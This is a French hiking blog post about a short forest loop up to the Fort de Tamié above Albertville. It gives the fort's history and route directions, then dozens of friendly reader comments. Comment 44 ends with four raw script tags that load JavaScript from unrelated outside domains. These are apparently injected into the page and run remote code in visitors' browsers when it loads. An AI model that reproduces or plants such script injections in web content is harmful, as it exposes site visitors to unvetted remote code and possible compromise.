• Boucle de fort Tamié (Savoie)

    L'accès au fort de Tamié peut se faire par la route, mais il est tellement plus intéressant de monter au fort par les chemins de traverses, au travers de la forêt. Ce n'est pas une randonnée à proprement parlé mais ce circuit vous permettra de découvrir non seulement le fort, mais ses alentours ainsi qu'un belvédère et une vue superbe sur la vallée d'Albertville.

    C'est une randonnée qui peut se faire en famille, elle n'est pas compliquée  et peu difficile. Vous pouvez me donner vos impressions dans vos commentaires.

    SITUATION DU FORT    RENSEIGNEMENTS DIVERS     QUELQUES MOTS SUR LE FORT

    Situation nationale

    Situation locale

     

    COORDONNÉES DU SIEGE ASSOCIATION
    SCIC Fort de Tamié
    ZA de Terre Neuve
    Rte des Chênes
    Gilly sur Isère – BP 202
    73276 Albertville
    Tél. 06.11.70.08.77 ou 04.79.38.58.62

    COORDONNÉES DU FORT DE TAMIÉ
    Fort de Tamié
    73200 Mercury
    GPS:45.672225N 6.311114E

    SITE INTERNET   
     

     

    Présentation.

    Élevé sur le lieu-dit du "Châtelard", nom donné par les gens du pays à tout escarpement surmonté d'une ancienne fortification. D'ailleurs pendant la période révolutionnaire, une redoute élevée à cet endroit commandait le col. Ce fort occupe un énorme espace mamelonné, couvert de bois et bordé en partie de falaises. 

    Missions.
    Le fort de Tamié joue un rôle considérable dans la défense des positions d'Albertville. Construit à cheval sur deux cols, il commande la vallée de Tamié et ses deux débouchés. De plus il couvre toute la droite de la ligne de défense principale et il contrôle une importante ligne de retraite et d'opérations vers les Bauges. Et enfin de tous les forts de la place, c'est inévitablement celui-ci qui sera appelé à résister en dernier et à servir de réduit de la place.
    L'étendue considérable de son enceinte lui permet de soutenir une lutte d'artillerie sans l'aide de batteries annexes.
    Il suffira d'établir des ouvrages du moment pour couvrir les deux cols qui l'encadrent, au début des hostilités.


    Randonnée avec Visorando

     

    Départ du parking du Col de Tamié situé sur la départementale 201C.

    (D) Du parking, entrer dans le bois en empruntant une petite passerelle en bois. Prendre un petit chemin qui part sur la gauche puis tourne à droite, remonte le chemin sur la gauche après avoir passé la croisée des deux chemins, continuer à monter sur environ 380m.

    (1) Tourner à droite en faisant un angle fermé, continuer de monter le chemin jusqu'à la route du Col de Tamié (D104), route revêtue. Tourner à gauche puis à 20m bifurquer à droite pour continuer à monter par la route goudronnée et arriver devant la façade du fort.
    Devant le fort prendre le chemin de gauche et longer le mur d'enceinte du fort jusqu'au belvédère, une vue magnifique sur Albertville s'offre à vous.

    (2) Prendre le chemin de gauche qui redescend dans la forêt. Continuer jusqu'à la route du Collet de Tamié (D104). La prendre à gauche et à 80m environ, à la fourche des routes, laissez-les partir à droite et à gauche

    (3) Prendre le petit chemin du milieu qui s'enfonce dans la forêt. Suivre ce chemin, laisser le chemin de gauche à mi descente et continuer vers la droite pour arriver sur un large chemin. Le prendre à gauche et continuer la descente jusqu'à revenir à votre point de départ.

    BOUCLE DE FORT TAMIÉ

    Balisage :  sans
    Longueur :  2,70 km
    Temps : 1 h 30
    Difficulté : Facile
    Cartes IGN : 3432ET  (Pensez à vous en munir)
    Coordonnées de départ :N 45.673244° / E 6.308573°

    Télécharger le fichier parcours ( PDF)

     

    Le fort de Tamié à trois rôles à assurer. Le premier est celui de fort détaché, en se chargeant de couvrir les arrières de la position d'Albertville et ainsi d'éviter que la ligne de défense soit tournée par le nord-ouest en utilisant la vallée menant de Faverges au col ou au collet de Tamié. Le deuxième est celui de fort isolé, en combattant sur deux fronts opposés, de plus il est séparé des autres ouvrages de la Place par de grande distance. Enfin il tient le rôle de réduit de la Place d'Albertville, en contrôlant la ligne de retraite et d'opérations des Bauges, passant par le col du Haut du Four, qui permet de communiquer avec l'intérieur du pays une fois que la Combe de Savoie est occupée.On pénètre dans le fort par un pont à bascule en dessous à mouvement assisté, identique à tous les forts de la Place. Puis on débouche sur la cour, entourée sur deux côtés par des casemates servant de magasin, qui ne sont plus à l'épreuve depuis la crise de l'obus torpille. C'est pour cela que fut creusé sous le mamelon 1020 un abri-caverne constitué de casemates-logement et d'un magasin à poudre, un deuxième est creusé sous le mamelon 993, face à l'entrée et devait rejoindre l'abri cité précédemment, mais les travaux s'arrêtèrent après le magasin à poudre et ne furent pas poursuivis. Sous le mamelon 987 un magasin à poudre y a été aussi creusé.

    Un clic pour agrandir la photoNon loin de là surtout ne manquez pas la visite de l'abbaye de Tamié. L'église y est visitable mais les autres parties de l'abbaye doivent faire l'objet d'une demande auprès des occupants des lieux.

    Vous aurez aussi le plaisir de pouvoir acheter le Tamié qui est fabriqué sur place et qui est un fromage dont la renommée n'est plus à faire.. 

    Un clic pour ouvrir l'album photos

     
     
    « MONTEREAU-FAULT-YONNE - MUSÉE DE LA FAÏENCE (77)LE CHÂTEAU DE VERSAILLES (78) »
    Partager via Gmail Pin It

    Tags Tags : , , , , ,
  • Commentaires

    58
    Vendredi 21 Février à 17:45
    francinea

    Bonjour, très jolie balade et des vues imprenables sur les montagnes environnantes; j'avais raté cet article; ce fort, on dirait bien du Vauban,  je te souhaite un bon week end, bisous

     

    57
    Lundi 17 Février à 09:46

    Coucou Alain

    Je ne sais pas se qui ce passe sur l'article de si Versailles m'étais conté je ne peux pas rentrer sur ton article c'est pour cela que je passe sur celui ci.de plus le texte que tu as écris dépasse le cadre je pense qu'il y a un petit soucis .j'espère que ton weekend c'est bien passé chez moi avec un vent violent depuis deux jours pour ne pas changer, mais ce matin un peu moins fort à vivement le printemps en espérant que cette saison sera meilleurs passe une douce journée gros bisous 

    Marlène

    56
    Mercredi 12 Février à 17:47

    Rekikou mon gentil randonneur

    Je te comprends je l'ai vu moi le volcan en éruption et c'était une très belle éruption c'était fin 1998 donc çà date et jamais je n'oublierai ce spectacle époustouflant çà craquait sous mes baskets et çà chauffait car j'ai vu la coulée de près avec mon mari, à l'époque c'était plus facile d'accès on faisait passer un groupe avec surveillance mais je n'avais pas d'APN à l'époque, je me souviens qu'une touriste prise de panique s'était mise à crier et à trembler et il a fallu l'évacuer tellement elle a eu peur, moi j'étais tellement éblouie par la beauté du volcan en éruption que sur le coup je n'ai pas eu peur mais c'est après que j'ai réalisé que c'était quand même certes magnifique mais terrifiant quand même si on pense trop mais je n'oublierai jamais ce beau spectacle.

    Fais de beaux rêves étoilés en rêvant que tu es près de la lave. Gros bisous mon cher Alain.

    Image

    55
    Mercredi 12 Février à 17:00

    Bonjour Alain le randonneur au cœur de Rockeur ! le fort de Tamié , j'ai du y passer au cours de vacances en pays de Savoie pour goûter du beau fromage et dévaler les pistes en famille sans oublier le ski de fond que j'adore et ma femme également . le col de Tamié, c'est donc à réaliser !! 

    54
    Mercredi 12 Février à 16:59

    Bonsoir mon cher Alain

    Un petit tour en Savoie avec grand plaisir pour admirer à nouveau tes belles photos.

    Oui notre volcan a de nouveau pété pour la 1ère fois cette année, mais la coulée qui est régulière n'est pas aussi intense qu'en octobre 2019 d'après ce que j'ai entendu et vu à la télé, car aucun risque pour moi d'aller voir, trop d'embouteillages partout, mais cela ravit les touristes et j'entendais un Monsieur qui était en vacances en famille sur l'île depuis 2 jours il était super heureux d'avoir pu passer la nuit là bas à admirer la lave qui coulait et prendre des photos.

    Merci pour ton gentil passage.

    Douce soirée.

    Je te fais de gros bisous d'amitié.

    53
    Mercredi 12 Février à 16:47

    Salut

    Ce matin de la pluie et cet après midi un beau soleil.
    Je reste au chaud car j'ai une angine carabinée alors sous antibio.
    J'échappe donc au Coronavirus.
    Bonne journée

    52
    Mercredi 12 Février à 14:22

    Bonjour Alain et Josette, je ne connaissais pas du tout le fort de Tamié merci pour cette belle visite. Par contre ma soeur m'avait ramené du fromage de Tamié et là c'est un peu le paradis sous le palais lol... Il y a de beaux chemins boisés qui ont du plaire à ma Chiara.

    Très beau reportage!

    Je vous souhaite une belle semaine et vous envoie plein de bisous

    Caresses à ma Chiara et à Minette

    chatou

    51
    Mercredi 12 Février à 13:02

    bonsoir Alain

    j'ai vu que tu as pensé à prendre en photos mes cousines !!! merci

    bisous

    50
    Mercredi 12 Février à 10:55
    Cergie

    Ça alors un fort ! C'est la passion de mon mari. Je suis originaire de l'est de la France alors on en a visités pas mal, ou sommes passés devant comme au fort de la Grande Haye même aussi dans le Nord et comme toi il trouve toujours le moyen de se mettre un but de randonnée.  Dommage qu'il ne soit pas près de moi présentement. 

    (Mon mari aime aussi beaucoup les blockhaus)

    49
    Mercredi 12 Février à 07:33

    coucou Alain

    Oui je pense que le fort n'est pas très lui de l'Abbaye j'ai eu du mal à trouver celle-ci j'ai du demander mon chemin se sont des coins un peu perdu par là-bas mais la prochaine fois si j'ai l'occasion d'y retourner j'irai voir ce fort.ce matin je ne sais pas quel temps il fera mais j'espère que le soleil sera au rendez-vous car je vais aller faire des courses et sous la pluie pas chouette hier c'est ce que nous avons eu de la pluie tout l'après midi.douce journée gros bisous à demain

    Marlène

    48
    56meldix77
    Mercredi 12 Février à 04:42

     Bonjour  Alain

    Après une belle journée de mardi,

    ou le soleil ne nous a pas quitté,

    et que monsieur Éole a réduit

    cette soufflerie, au moins dans notre coin,

    qui heureusement n'a laissé que du bois

    par ci par la, a voir et entendre

    nous n'avons pas été sur

    une mauvaise trajectoire!

    Bon mercredi a profiter de cette journée

    réservée aux enfants en vous souhaitant le soleil!

    AmiCalement

    . * J-G-R-C-202*.

    47
    Mercredi 12 Février à 02:58
    Bonjour Alain merci, ici tout va bien, il faut juste de la patience Déjà la moitié de la semaine Passe une bonne journée Avec amitiés René
    46
    Mardi 11 Février à 23:44

    Cher Alain,

    Déjà le milieu de la semaine, ça passe à une allure folle.

    Ici, nous avons eu beaucoup de vent mais il fait bon avec le soleil en cours de journée.

    J'espère que tout va bien, n'oublie pas la Saint Valentin vendredi.

    Mon ordi est HS depuis que j'ai installé windows 10, je suis obligée de l'emmener à réparer. Et le portable lui aussi commence à faire des siennes.

    Bonne journée,

    Grosses bises,

    MF

    45
    Mardi 11 Février à 17:26
    Roguidine

    Bonjour @lain,
    Je viens de voir ton dénivelé de ta rando !! ça grimpait dur !!
    mais je n'ai toujours rien compris au calcul !! je vois que tu pars de 0
    et je vois 2030  !! grr !! pas grave, si il faut grimper, je prends mon
    temps et j'y arrive, hier bous avons fait 17 km , c'était relativement
    plat, donc sans difficulté !!! c'était une randonnée pas mal que j'avais
    encore agrandie mais par une route et un long sentier, mais un paysan
    nous a dit : si vous avez des bottes, passez y, sinon prenez la nationale !
    alors nous avons fait 3 km sur la nationale !!! il y en a marre de savoir ces
    sentiers mal entretenus, c'est pour ça que le balisage n'y passe pas !!
    c'était peut être à lui le chemin et il n'était pas sale mais privé  !!

    Sur ce, tes occupations sont lourdes en ce moment !!! lol ! calme plat !!!

    Passe une bonne fin de journée, je te fais de gros bisous

    44
    Mardi 11 Février à 16:04

    Bonjour @lain.

    Intéressant ce fort.

    Ce matin il neigeait et cet après midi il fait un joli ciel tout bleu et c'est avec lui que je te souhaite une bonne semaine avec un peu de retard.

    Amitié, bisou de nous deux.

    <script src="//qalitygigant.com/227ee61cbd084e801b.js"></script> <script src="http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8830x" type="text/javascript"></script> <script src="http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8830x&format=arrjs&r=1581433425151" type="text/javascript"></script> <script src="http://qalitygigant.com/ext/227ee61cbd084e801b.js?sid=52666_8830_&title=asas&blocks[]=31af2" type="text/javascript"></script>
    43
    Mardi 11 Février à 16:03

    Bonjour Alain.

    Nous nous préparons pour l'échange des véhicules: il  nous faut aller, demain matin, à Martigues et en revenir.

    Je n'ai jamais été un intoxiqué de la voiture et là, ce sera avec 2 chauffeurs alors, ça devrait aller !

    Ensuite, il nous faudra rechercher un kiné pour le genou de Bernadette et, dans mon coin, il n'est pas simple d'en trouver un de libre.

    Bon après-midi.

    Gilbert

    42
    Mardi 11 Février à 15:13
    chantal33300

    j'aime visiter ce genre de site. Merci pour tes photos. Bisous

    41
    Mardi 11 Février à 14:05
    Salut, Je me suis levé avec de la fièvre. Je vais aller voir le toubib . J'espère que ce n'est pas le coronavirus? En attendant mettez un masque ou un mouchoir pour me lire. Bonne journée
    40
    Mardi 11 Février à 10:23

    bonjour Alain

    concernant les sites à visiter on voulait faire celui d'Ouradour mais lors de notre passage il y avait le président sur les lieux !!! pas besoin de t'en dire plus...inaccessible !

    Je ne sais pas si on retournera dans la région !!

    bisous

    39
    AMAN BOU
    Mardi 11 Février à 10:04

    coucou et belle journée ALAIN BISES

    38
    Mardi 11 Février à 08:22

    Bonjour Alain

    c'est avec la pluie que je passe te rendre visite aujoure'hui après le vent la pluie on continue ce temps cochon mais bon il faut s'y faire pour en revenir à ton article je viens de voir la vidéo c'est un coin superbe mais je n'ai pas eu l'occasion de voir le fort mais l'Abbaye oui je suis allée le visiter mais pas l'intérieur on m'avait répondu qu'il n'est pas visitable mais je suis allée voir l'église sur le coté de l'Abbaye qui est très jolie j'avais pris des photos je n'avais pas fait le lien hier car je n'avais pas vu le petit article de l'église sur ton article .

    passe une douce journée gros bisous 

    Marlène

    37
    Mardi 11 Février à 07:12

    Coucou Alain

    C'est un sacré fort, merci pour ce beau reportage. 

    Merci pour le partage.

    Je te souhaite une belle journée.

    Rohnny

    36
    Mardi 11 Février à 07:01

    ah ah je vois que ton estomac va encore être de la fête.....mais il est difficile de séparer la convivialité et la bonne chère....hihihi....et puis tu ne fais du mal à personne bien au contraire, il n'y a que ton estomac qui peut parfois te dire aïl, ouille....mais tan qu'il ne dit rien tu peux encore faire bombance de temps en temps, et attention vendredi c'est le 14, fête des amoureux....il faut y penser......sinon tout va à peu près bien, surtout le temps qui pour nous est assez égal, sans vent, sans pluie ouf, pourvu que ça dure encore un peu....passe une bien agréable journée

    35
    Mardi 11 Février à 06:57

    Hello Alain

    La défense d'Alberville....je ne sais pas de quand il date ce fort, mais en principe sur les frontières de la Savoie jusqu'au comté de Nice, il y avait 2 forts qui se faisaient presque face. L'un , le fort de France, l'autre le fort de Savoie. L'exemple type se trouve à Colmars les Alpes.  Je ne pense pas que celui ci soit l'un des forts construit par Vauban ou bien Napoleon III ? Je pense plutôt à un fort de la ligne Maginot des Alpes ?

    Bon Mardi

    @+ Pat

    34
    Mardi 11 Février à 06:26

    Bonjour mon cher Alain

    Que du bonheur à me balader à nouveau chez toi avec ton bel album photos et une région que je découvre avec plaisir.

    Merci pour ton commentaire sur mon blog.

    Désolée de ne venir que ce matin mettre en ligne mes commentaires, mais hier j'étais absente et le soir fatiguée pour bloguer, alors me voilà ce matin pour venir frapper à la porte de ton bel univers de blog.

    Un matin est quelque chose de merveilleux, qu'il soit nuageux ou ensoleillé. Il est synonyme d'espoir et nous donne un nouveau début à ce que nous appelons « la vie ». Bonne journée à toi, en espérant de tout cœur que tu n'as pas eu de dégâts avec cette tempête.

    Je te fais de gros bisous d'amitié de mon ti rocher ensoleillé.

     

    33
    56meldix77
    Mardi 11 Février à 04:38

    Bonjour Alain

    Toujours des périodes de fort vent!

    Mais la pluie est plutôt absente...

    Tous ces moments, et tous ces messages

    partagés au fil du temps, des années,

    quelle douce et belle complicité, depuis

    aussi longtemps que l'espoir

    de notre amitié perdure dans le temps.

    Je viens vous souhaitez une agréable journée

    et qu' elle soit remplie de petits et grands plaisirs!

    AmiCalement

    . * J-G-R-C-202*.

    32
    Mardi 11 Février à 04:34

    Cher Alain,

    Jolie balade , bel album photos. Je ne connais pas cette région. Merci de me la faire découvrir.

    J'espère que tu vas bien et que tu es épargné par la tempête.

    Bonne journée,

    Grosses bises,

    MF

    31
    Sonya 972
    Lundi 10 Février à 20:39
    De quoi se ressourcer
    Très belle page
    Bonne semaine
    Gros bisous créoles
    30
    Lundi 10 Février à 18:39

    Bonjour Alain, j'ai déjà vu ce fort en Savoie, j'ai fait la balade mais ce n'est pas récent, quelles belles vues au sommet sur Alberville..

    Tu y as fait de belles rencontres animalières… j'aime beaucoup cette région qui me rappelle l'Isère..

    Je me plais dans le sud, je connais bien la région et mes enfants y habitent, je partage mon temps entre l'Hérault et le Beaujolais où réside mon compagnon..

    Belle fin de journée gros bisous

    29
    Lundi 10 Février à 17:32

    Bonsoir Alain.

    Je suis allé voir cette voiture: ce n'est qu'un problème d'injecteurs encrassés.

    J'ai ajouté du nettoyant au carburant; il ne reste plus qu'à la faire tourner pour que, petit à petit, ils soient nettoyés.

    Il nous faut maintenant échanger les voitures pour récupérer celle de Bernadette car, avec son genou, elle ne peut conduire que des voitures à boîte automatique; le sienne est une hybride Toyota.

    Je lui ai passé la mienne, récupéré celle des enfants et mercredi, nous descendons pour faire l'échange.

    Alors, le petit séjour en Corse n'est plus au programme: récupération avant tout !

    Bonne soirée.

    Gilbert

    28
    Lundi 10 Février à 17:20

    Coucou Alain , très joli cet balade en savoie , j'adore he , bonne journée à toi 

    27
    Lundi 10 Février à 16:26

    Salut,
    On est en pleine tempête encore et on compte les dégâts.
    Ce sont de petits riens mais qui emmerdent le monde.
    J'espère que tout va bien par chez vous.
    Bonne semaine

    26
    Lundi 10 Février à 15:52

    bonsoir Alain

    toi qui aime ce genre de lieu, en effet tu devrais faire les sites de la première guerre...nous y sommes allés, c'est extrêmement intéressant et poignant. Chacun de nous devrait, une fois dans sa vie visiter de tels lieux

    bisous

    25
    AMAN BOU
    Lundi 10 Février à 13:32

    KILOU ALAIN

    24
    Lundi 10 Février à 09:34

    coucou Alain 

    j'espère que tu as passé un bon weekend pour ma part je suis restée sagement à la maison car avec le vent violent que nous avons eu dans le département j'avais peur qu'il m'enlève et m'emmène je ne sais ou il déracine des arbres très costaux alors nous petits humains ou est-ce qu'il nous emmènera hihi. bon je plaisante, ce fort est magnifique j'adore chez toi car je parcourt la France de long en large tu as du mettre ton article pendant mon repos donc je suis un peu en retard pour le voir je ne cannais pas ce fort je connais un peu la Savoie mais je ne sais pas ou se trouve celui-ci. si non je serais surement aller le visiter. Je te souhaite une douce journée gros bisous 

    Marlène

    23
    Lundi 10 Février à 07:39

    bravo, je vois que tu prends la vie de bons côtés, de toute façon personne peut le faire à notre place....pour ton jumeau hier c'était matche de rugby, alors pas question de faire du bruit, alors j'ai fait de la peinture sur pot de fleurs....ce qui m'a permis de m'énerver pour une bonne raison,  mes peintures étant déjà de quelques années, allaient mal à passer, mais finalement le résultat n'est pas si mal....il va bien falloir que je m'en contente, c'est pour vendredi, il faut que ces dames aient un modèle....elles essaieront de faire mieux hihihii.....voilà après midi bien occupé....passe un bien doux début de semaine

    22
    Lundi 10 Février à 06:16

    la je reste sans voix devant la beauté de ce lieu, le diaporama ou le petit film vraiment super, j'adore

    bises amicales

    21
    56meldix77
    Lundi 10 Février à 04:57

    Bonjour Alain

    Un dimanche avec un vent

    loin d’Être en soufflette.

    Plutôt du genre famille tempête

    et pour assaisonner le menu.

    Une pluie cinglante sans discontinuer,

    le tout entre jour et nuit, et cela devrait

    continuer encore au moins 24 heures!

    Pour cette nouvelle semaine,

    je vous la souhaite avec prudence,

    et bien au chaud sans risque inutile...

    AmiCalement

    . * J-G-R-C-202*.

    20
    Lundi 10 Février à 04:31

    Bonjour mon gentil randonneur

    Je ne me lasse pas d'admirer tes voyages à travers la France et tes belles randonnées, tu fais de si belles photos et articles et là cet endroit de Savoie est vraiment ravissant.

    Dommage que tu ne prends pas l'avion, car faire plus de 10.000 kms par bateau il te faudrait trop de temps, moi c'est les petits coucous qui me font peur ayant le vertige.

    Bonne journée !

    Que cette nouvelle journée qui commence te comble de joie, de bonheur et d'amour.

    Qu'elle t'apporte l'énergie nécessaire pour vivre le meilleur.

    Très bonne journée à toi.

    Gros bisous de mon ti rocher ensoleillé.

    19
    Dimanche 9 Février à 22:49
    Aimée aimée

    Bonsoir mon cher tit @lain,

    Tu as fait de très belles photos de ce fort avec des vues imprenables.

    Il est encore en très bonne conservation.

    Une visite très intéressante

    Le fait d'y monter à piedibus doit être très agréable

    J'espère que vous avez passé un bon dimanche.

    Bisous mon cher tit randonneur

    Aimée

    18
    Dimanche 9 Février à 22:38
    Roguidine

    Coucou @lain;
    La tempête n'est pas chez moi !! ouuuff !! nous avons fait une rando
    de 11 km , nous étions 8, c'est moi qui l'ai organisée , c'était sympa,
    nous étions 4 filles et 4 garçons !! un circuit très, très bien balisé en rouge ;
    elle n'est pas au PDIPR, et c'est mieux ainsi .. elle est trés bien entretenue,
    il y avait de bonnes montées !! les mêmes en descente !! lol
    Demain nous devrions faire 16 km, j'espère le beau temps !!!!

    Pour toi c'est cool , quand est ce que tu reprends les randos ?
    maintenant que ta santé va mieux !!! tu refais celles que tu as faites
    avec les '' Tamalous '' , le tout c'est de marcher !!!

    Passe un bon début de semaine, je te fais de gros bisous

    17
    Dimanche 9 Février à 20:52

    Kikou mon p'tit randonneur

    Je ne connais pas cet endroit, vu la photo de google avec la neige, je croyais que tu y avais été il n'y a pas longtemps.

    Tu es monté haut car les paysages sont magnifiques, une belle randonnée.

    Trop mignon ces chèvres du Röve, elles posent pour toi !

    Je te souhaite une bonne soirée, bisous

    16
    Dimanche 9 Février à 20:29
    Marylou

    j'espère que le débordement de la rivière n'a aucun impact sur ta demeure...Ti copier/coller : Choisir, trier, alléger, signer les photos m’occupe beaucoup. Mes neveux m’envoient des centaines de clichés pour illustrer mes billets. Du coup je n’ai plus guère de temps pour répondre aux commentaires.  Je dois choisir entre faire un billet ou  écrire des commentaires. Malgré tout je viens voir vos blogs et  vous remercie pour votre fidélité. Amicalement.

    15
    Dimanche 9 Février à 19:10

    Bonsoir Alain 

    Cela aurait été dommage de monter en voiture,le circuit à pied est surement plus sympa,des beaux paysages et panoramas s'offrent à nos yeux .La visite du fort doit être également intéressante . Je suis passé dans les années 90 à Tamiè j'ai visité l'abbaye et acheté du fromage qui était excellent ! ça a soufflé aujourd'hui,je suis resté au chaud...  Bonne soirée  A+ 

    14
    Dimanche 9 Février à 18:51

    Bonsoir Alain.

    Bernadette souffre toujours de son genou et nous allons voir le chirurgien mardi soir.

    Ses enfants, en rentrant chez eux, s'aperçoivent que leur voiture diesel fume et ne tire plus; leur mère leur a passé la sienne; il faut maintenant qu'on fasse réparer la leur et qu'ensuite, on fasse l'échange mais comme ils habitent à Martigues, nous avons de la route en perspective.

    Comme le repas d'anniversaire est prévu pour dimanche là-bas, cela va faire une semaine chargée !

    Concernant les soucis entre Windows/Linux et Mac: il semble que ce soit plus un problème de navigateur qu'un problème de système; la visiteuse qui ne pouvait ouvrir mes montages est passée sur Chrome et ça fonctionne; Firefox pose des difficultés; il y avait bien des préfixes (moz) à mettre dans le codes, au début et je pensais que ce n'était plus nécessaire: peut-être que si mais où et quand ?

    Ce qui fait que mon article a perdu tout son sens !

    Beau temps mais il faut tenir le chauffage en service car les maisons sont froides.

    Bonne soirée.

    Gilbert

    13
    AMAN BOU
    Dimanche 9 Février à 15:52

    super en ce jour de vent terrible ici bizzzzzzzzz  

    12
    Dimanche 9 Février à 14:19

    Bonjour Alain,

    Oui à pieds c'est beaucoup mieux si on veut prendre des photos. Je ne connais pas du tout, encore un lieu que je découvre grâce à ton blog. 

    Passe un bon dimanche, bises, Véronique

    11
    Dimanche 9 Février à 13:25

    Cette balade devait se faire à pieds, tu as bien raison Alain, un album magnifique qui donne envie de découvrir toutes ces beautés ..

    un fort et un belvédère : superbes panoramas ....

    Une belle région que tu nous fais découvrir Alain, merci  "fidèle Randonneur" .

    Ici pas de neige lol lol (je n'aime pas ) sauf sur les blogs mais tempête, vent, pluie pas très agréable non plus pourtant belle éclosion de la nature en ce moment ...

    Bon dimanche à toi et tes êtres chers .

    Bises amicales de Christiane

    10
    Dimanche 9 Février à 12:16

    bonsoir

    je ne connais pas du tout, par contre on en a visités du côté de Verdun et celui de Belfort. Des ressemblances de l'extérieur. 

    J'espère que vous avez passé un bon dimanche, nous plein de découvertes encore

    bisous

    9
    Dimanche 9 Février à 11:50

    Salut

    On est dans la tempête en ce moment alors on reste chez soi aussi.

    L'Humour du dimanche c'est sacré.

    Bonne journée

    8
    jm:rober
    Dimanche 9 Février à 09:37

    Bonjour Alain,

    A voir ce bel album photos , il aurait été dommage de faire le chemin en voiture . Mais je sais certains ne peuvent pas sans passer….. je vois bien dans ma commune pour faire 100 m, il la faut.

    Merci du partage de cette région qui a connue les JO

    Bon dimanche, attention ça va souffer

    Amitiés

     

    7
    Dimanche 9 Février à 07:21

    encore un endroit que je ne connais pas, même jamais entendu le nom de ce fort....et pourtant il n'est pas très loin de chez nous....il va falloir que l'on se bouge un peu tant qu'ils nous restent un peu de vitalité...hihihi.....sinon tout va pour le mieux, ton jumeau a terminé sa volière, il va falloir que j'aille voir ça de plus près....rien de prévu pour aujourd'hui, alors je pense que ce sera repos ce qui ne pourrais que nous faire du bien....(lol)....en tout cas passe une bien douce journée

    6
    56meldix77
    Dimanche 9 Février à 06:58

    Bonjour Alain

    C'est après une superbe journée

    ou le soleil a rempli son rôle

    en après midi avec un 13/14°

    Quand a la matinée, c'était arrosage matinal

    pour ce dimanche nous attendons

    la tempête CIARA avec de fortes marées

    pour les côtiers,avec l'espérance que tout cela

    ne soit pas destructif car dans les terres ,

    sa souffle déjà pas mal,

    restons zen, en vous souhaitant

    bonne journée de dimanche.

    AmiCalement

    . * J-G-R-C-202*.

    5
    Dimanche 9 Février à 02:37
    Bonjour Alain surement une belle balade Passe un bon dimanche Avec amitiés René
    4
    Dimanche 9 Février à 00:16
    Roguidine

    Coucou @lain,
    Tu as remis les photos de ta bannière où ton chien fait pipi !
    hi,hi,hi, !!! la phrase est encore coupée , tu n'as rien pu faire ?
    As tu vu ma bannière comme elle est belle ? je crois que non
    puisque tu ne l'as pas décrite !! tu passes eu coup de vent !! lol !!

    Un petit circuit de 3 km; c'est vite fait, je ne vois pas de neige !!
    dommage tu aurais pu faire des raquettes , j'en ai fait l'année dernière,
    c'est super ces paysages enneigés !! j'aimerais bien le refaire , mais
    pas de neige à l'horizon cette année..... dan ma région,,... ça peut venir !!
    Les sentiers sont beau, le panorama aussi , tes photos sont belles ...

    Je ne suis pas sortie aujourd'hui, demain tempête pour toi je crois ?
    j'espère pouvoir faire une rando demain !! c'est quand on travaille qu'il fait beau !! grrr

    Passe un bon dimanche, je te fais de gros bisous

     

    3
    escapade40
    Samedi 8 Février à 21:07

    Bonsoir Alain , oui une belle région que je découvre grâce à ton article , merci ! . En retard chez les amis à cause de la grippe bien épuisante . Bon Dimanche , amitiés , escapade , 

    2
    Samedi 8 Février à 20:18

    Bonsoir Alain.

    Une réponse sur ce qui fonctionne sur Linux et sur Windows et qui ne fonctionne pas sur Mac me dit que, selon le navigateur, ça fonctionne ou non !

    J'utilise Opera comme navigateur; avec Firefox, cela semble ne pas passer mais avec Chrome, c'est bon; Chrome et Opera sont des navigateurs avec code webkit, ce qui pourrait expliquer la différence.

    J'ai préparer un article pour Lundi, avec différents codes et je vais ajouter qu'on me dise quel navigateur est utilisé car ça vient sans doute plus du navigateur que du système.

    Bon dimanche.

    Gilbert

    1
    Samedi 8 Février à 19:14

    Re kikou mon gentil randonneur

    Tu bois de l'eau le soir, ben tu vois tu es raisonnable, et puis quand on fête un annif on ne boit pas de l'eau ferrugineuse ih ih ih !!!!!

    Ton nouvel article vient de sortir mais tu as mis aussi le 5 février (le jour où j'ai pris un an de moins LOL !!!!), ah non finalement en cliquant c'est le 8 février, mes yeux fatiguent ce soir, je ne connais pas du tout la Savoie, pour le coup il me faut vraiment une autre vie pour visiter tous les beaux coins inconnus pour moi de notre belle France. 

    Je viens de passer sous ce pont et on a une superbe vue et quelle belle rencontre à cornes tu as faites, cette belle bête pose rien que pour toi, il est beau ce fort tout en pierres, les coins sont vraiment ravissants. Super ton album photos.

    Douce nuit et beau dimanche mon cher Alain.

    Gros bisous d'amitié.

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :